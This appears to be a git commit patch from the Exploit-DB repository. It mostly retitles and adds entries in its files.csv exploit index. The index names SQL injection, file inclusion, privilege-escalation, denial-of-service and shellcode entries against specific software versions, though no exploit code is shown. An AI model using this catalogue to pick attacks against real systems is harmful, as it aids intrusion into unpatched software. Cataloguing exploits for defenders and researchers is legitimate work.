From 32e86030d5f132fe8343c5307798c5d77875296f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 15 Dec 2016 13:07:17 +0000 Subject: [PATCH] DB: 2016-12-15 3 new exploits minix 3.1.2a - tty panic Local Denial of Service minix 3.1.2a - tty panic Remote Denial of Service Minix 3.1.2a - tty panic Local Denial of Service Minix 3.1.2a - tty panic Remote Denial of Service Microsoft IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service MINIX 3.3.0 - Local Denial of Service (PoC) Minix 3.3.0 - Local Denial of Service (PoC) MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service Minix 3.3.0 - Remote TCP/IP Stack Denial of Service Apache 2.4.23 (mod_http2) - Denial of Service Adobe Animate 15.2.1.95 - Memory Corruption CoolPlayer - m3u File Local Buffer Overflow CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit) Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit) Apache Tomcat (WebDAV) - Remote File Disclosure Apache Tomcat - (WebDAV) Remote File Disclosure Apache Tomcat (WebDAV) - Remote File Disclosure (SSL) Apache Tomcat - (WebDAV) Remote File Disclosure (SSL) APT - Repository Signing Bypass via Memory Allocation Failure PHPFootball 1.6 - (show.php) Remote Database Disclosure PHPFootball 1.6 - Remote Database Disclosure Aprox CMS Engine 5 (1.0.4) - Local File Inclusion Aprox CMS Engine 5.1.0.4 - Local File Inclusion PHP Help Agent 1.1 - (content) Local File Inclusion PHP Help Agent 1.1 - 'content' Parameter Local File Inclusion Alstrasoft Affiliate Network Pro - (pgm) SQL Injection Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection Aprox CMS Engine 5.(1.0.4) - 'index.php' SQL Injection Siteframe - 'folder.php id' SQL Injection PHPFootball 1.6 - (show.php) SQL Injection DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection Siteframe CMS 3.2.3 - 'folder.php' SQL Injection PHPFootball 1.6 - SQL Injection DigiLeave 1.2 - 'book_id' Parameter Blind SQL Injection HRS Multi - 'key' Parameter Blind SQL Injection MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection EZWebAlbum (dlfilename) - Remote File Disclosure Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection ShopCartDx 4.30 - 'pid' SQL Injection MojoPersonals - Blind SQL Injection MojoJobs - Blind SQL Injection MojoAuto - Blind SQL Injection EZWebAlbum - Remote File Disclosure Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection ShopCartDx 4.30 - 'pid' Parameter SQL Injection YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Pre Survey Poll - 'default.asp catid' SQL Injection Atom Photoblog 1.1.5b1 - (photoId) SQL Injection ibase 2.03 - 'download.php' Remote File Disclosure YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting Pre Survey Poll - 'catid' Parameter SQL Injection Atom Photoblog 1.1.5b1 - 'photoId' Parameter SQL Injection ibase 2.03 - Remote File Disclosure Live Music Plus 1.1.0 - 'id' SQL Injection xrms 1.99.2 - (Remote File Inclusion / Cross-Site Scripting / Information Gathering) Multiple Vulnerabilities Live Music Plus 1.1.0 - 'id' Parameter SQL Injection XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering FizzMedia 1.51.2 - (comment.php mid) SQL Injection PHPTest 0.6.3 - (picture.php image_id) SQL Injection FizzMedia 1.51.2 - SQL Injection PHPTest 0.6.3 - SQL Injection Mobius 1.4.4.1 - (browse.php id) SQL Injection EPShop < 3.0 - 'pid' SQL Injection Mobius 1.4.4.1 - SQL Injection EPShop < 3.0 - 'pid' Parameter SQL Injection TriO 2.1 - (browse.php id) SQL Injection CMScout 2.05 - (common.php bit) Local File Inclusion Getacoder clone - (sb_protype) SQL Injection GC Auction Platinum - (cate_id) SQL Injection SiteAdmin CMS - (art) SQL Injection TriO 2.1 - 'browse.php' SQL Injection CMScout 2.05 - 'bit' Parameter Local File Inclusion Getacoder clone - 'sb_protype' Parameter SQL Injection GC Auction Platinum - 'cate_id' Parameter SQL Injection SiteAdmin CMS - 'art' Parameter SQL Injection Youtuber Clone - 'ugroups.php UID' SQL Injection Youtuber Clone - SQL Injection PixelPost 1.7.1 - (language_full) Local File Inclusion PixelPost 1.7.1 - 'language_full' Parameter Local File Inclusion ViArt Shop 3.5 - (category_id) SQL Injection Minishowcase 09b136 - 'lang' Local File Inclusion ViArt Shop 3.5 - 'category_id' Parameter SQL Injection Minishowcase 09b136 - 'lang' Parameter Local File Inclusion Gregarius 0.5.4 - rsargs[] SQL Injection PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion hiox browser Statistics 2.0 - Remote File Inclusion Gregarius 0.5.4 - SQL Injection PHP Hosting Directory 2.0 - Remote File Inclusion HIOX Random Ad 1.3 - Remote File Inclusion HIOX Browser Statistics 2.0 - Remote File Inclusion nzFotolog 0.4.1 - (action_file) Local File Inclusion ZeeReviews - 'comments.php ItemID' SQL Injection nzFotolog 0.4.1 - 'action_file' Parameter Local File Inclusion ZeeReviews - SQL Injection Article Friendly Pro/Standard - (Cat) SQL Injection Article Friendly Pro/Standard - SQL Injection PozScripts Classified Ads Script - 'cid' SQL Injection TubeGuru Video Sharing Script - (UID) SQL Injection PozScripts Classified Ads Script - 'cid' Parameter SQL Injection TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection camera life 2.6.2b4 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection Alstrasoft Article Manager Pro 1.6 - Authentication Bypass viart shopping cart 3.5 - Multiple Vulnerabilities Viart shopping cart 3.5 - Multiple Vulnerabilities PHPFootball 1.6 - (filter.php) Remote Hash Disclosure PHPFootball 1.6 - Remote Hash Disclosure talkback 2.3.14 - Multiple Vulnerabilities Siteframe CMS 3.2.x - (SQL Injection / phpinfo()) Multiple Vulnerabilities TalkBack 2.3.14 - Multiple Vulnerabilities Siteframe CMS 3.2.x - SQL Injection / phpinfo() CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities CMScout - Cross-Site Scripting / HTML Injection ShopCartDx 4.30 - (products.php) Blind SQL Injection ShopCartDx 4.30 - 'products.php' Blind SQL Injection viart shop 4.0.5 - Multiple Vulnerabilities ViArt Shop 4.0.5 - Multiple Vulnerabilities Siteframe 3.2.3 - (user.php) SQL Injection Siteframe CMS 3.2.3 - 'user.php' SQL Injection viart shop 4.0.5 - Cross-Site Request Forgery ViArt Shop 4.0.5 - Cross-Site Request Forgery Siteframe 2.2.4 - search.php Cross-Site Scripting Siteframe 2.2.4 - download.php Information Disclosure Siteframe CMS 2.2.4 - 'download.php' Information Disclosure phpx 3.2.3 - Multiple Vulnerabilities PHPX 3.2.3 - Multiple Vulnerabilities PHPX 3.x - admin/page.php Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - admin/news.php Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - admin/user.php Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - admin/images.php Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - admin/forums.php Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - 'page.php' Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - 'news.php' Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - 'user.php' Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary Command Execution Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting Alstrasoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection PHPX 3.5.15/3.5.16 - users.php user_id Parameter SQL Injection PHPX 3.5.15/3.5.16 - news.php Multiple Parameter SQL Injection PHPX 3.5.15/3.5.16 - gallery.php Multiple Parameter SQL Injection PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection XRms 1.99.2 - activities/some.php title Parameter Cross-Site Scripting XRms 1.99.2 - companies/some.php company_name Parameter Cross-Site Scripting XRms 1.99.2 - contacts/some.php last_name Parameter Cross-Site Scripting XRms 1.99.2 - campaigns/some.php campaign_title Parameter Cross-Site Scripting XRms 1.99.2 - opportunities/some.php opportunity_title Parameter Cross-Site Scripting XRms 1.99.2 - cases/some.php case_title Parameter Cross-Site Scripting XRms 1.99.2 - files/some.php file_id Parameter Cross-Site Scripting XRms 1.99.2 - reports/custom/mileage.php starting Parameter Cross-Site Scripting XRms 1.99.2 - 'title' Parameter Cross-Site Scripting XRms 1.99.2 - 'company_name' Parameter Cross-Site Scripting XRms 1.99.2 - 'last_name' Parameter Cross-Site Scripting XRms 1.99.2 - 'campaign_title' Parameter Cross-Site Scripting XRms 1.99.2 - 'opportunity_title' Parameter Cross-Site Scripting XRms 1.99.2 - 'case_title' Parameter Cross-Site Scripting XRms 1.99.2 - 'file_id' Parameter Cross-Site Scripting XRms 1.99.2 - 'starting' Parameter Cross-Site Scripting Pligg 1.0.4 - 'install1.php' Cross-Site Scripting Joomla! Component DT Register - 'cat' SQL Injection Joomla! Component DT Register - 'cat' Parameter SQL Injection --- files.csv | 189 ++++++++++++++++--------------- platforms/linux/dos/40909.py | 45 ++++++++ platforms/linux/remote/40916.txt | 184 ++++++++++++++++++++++++++++++ platforms/php/webapps/22384.txt | 11 -- platforms/php/webapps/34269.txt | 11 -- platforms/php/webapps/5975.txt | 6 +- platforms/windows/dos/40915.txt | 133 ++++++++++++++++++++++ 7 files changed, 460 insertions(+), 119 deletions(-) create mode 100755 platforms/linux/dos/40909.py create mode 100755 platforms/linux/remote/40916.txt delete mode 100755 platforms/php/webapps/22384.txt delete mode 100755 platforms/php/webapps/34269.txt create mode 100755 platforms/windows/dos/40915.txt diff --git a/files.csv b/files.csv index c2ea9558b..f8ccfe847 100644 --- a/files.csv +++ b/files.csv @@ -755,8 +755,8 @@ id,file,description,date,author,platform,type,port 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 -6120,platforms/minix/dos/6120.txt,"minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 -6129,platforms/minix/dos/6129.txt,"minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 +6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 +6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - (reboot) Remote Denial of Service",2008-08-03,crit3rion,hardware,dos,0 @@ -2534,7 +2534,7 @@ id,file,description,date,author,platform,type,port 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router Denial of Service",2001-09-21,Sniffer,hardware,dos,0 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos,0 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0 -20854,platforms/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0 +20854,platforms/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow (PoC)",2012-08-28,LiquidWorm,windows,dos,0 20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0 @@ -4382,7 +4382,7 @@ id,file,description,date,author,platform,type,port 35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,windows,dos,0 35164,platforms/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0 -35173,platforms/linux/dos/35173.txt,"MINIX 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0 +35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 @@ -4391,7 +4391,7 @@ id,file,description,date,author,platform,type,port 35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial of Service",2011-01-19,"Craig Freyman",windows,dos,0 35279,platforms/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0 -35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 +35302,platforms/linux/dos/35302.c,"Minix 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 @@ -5305,8 +5305,10 @@ id,file,description,date,author,platform,type,port 40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0 40905,platforms/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos,0 40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0 +40909,platforms/linux/dos/40909.py,"Apache 2.4.23 (mod_http2) - Denial of Service",2016-12-12,"Jungun Baek",linux,dos,0 40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0 40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0 +40915,platforms/windows/dos/40915.txt,"Adobe Animate 15.2.1.95 - Memory Corruption",2016-12-14,hyp3rlinx,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5878,7 +5880,7 @@ id,file,description,date,author,platform,type,port 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow",2008-07-11,Shinnok,windows,local,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)",2008-07-21,"Guido Landi",windows,local,0 -6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0 +6157,platforms/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0 6188,platforms/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0 @@ -6790,7 +6792,7 @@ id,file,description,date,author,platform,type,port 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,windows,local,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 -40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 +40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 @@ -9517,13 +9519,13 @@ id,file,description,date,author,platform,type,port 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,linux,remote,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 -4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0 +4530,platforms/multiple/remote/4530.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0 4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501 4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,linux,remote,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,linux,remote,27015 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,linux,remote,0 -4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 +4552,platforms/linux/remote/4552.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 4556,platforms/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,windows,remote,10616 4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,multiple,remote,0 @@ -15155,6 +15157,7 @@ id,file,description,date,author,platform,type,port 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0 +40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -17184,7 +17187,7 @@ id,file,description,date,author,platform,type,port 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0 -3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 +3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 3227,platforms/php/webapps/3227.txt,"CascadianFAQ 4.1 - 'index.php' SQL Injection",2007-01-30,ajann,php,webapps,0 3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - (themefunc.php) Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0 3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0 @@ -18988,7 +18991,7 @@ id,file,description,date,author,platform,type,port 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' Parameter SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 -5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 +5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5.1.0.4 - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 @@ -19157,78 +19160,78 @@ id,file,description,date,author,platform,type,port 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection",2008-07-15,K-159,php,webapps,0 -6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 +6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - 'content' Parameter Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injections",2008-07-15,Mr.SQL,php,webapps,0 6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution",2008-07-16,Inphex,php,webapps,0 6086,platforms/php/webapps/6086.txt,"Joomla! Component DT Register - SQL Injection",2008-07-16,His0k4,php,webapps,0 -6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0 +6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,php,webapps,0 -6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 +6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 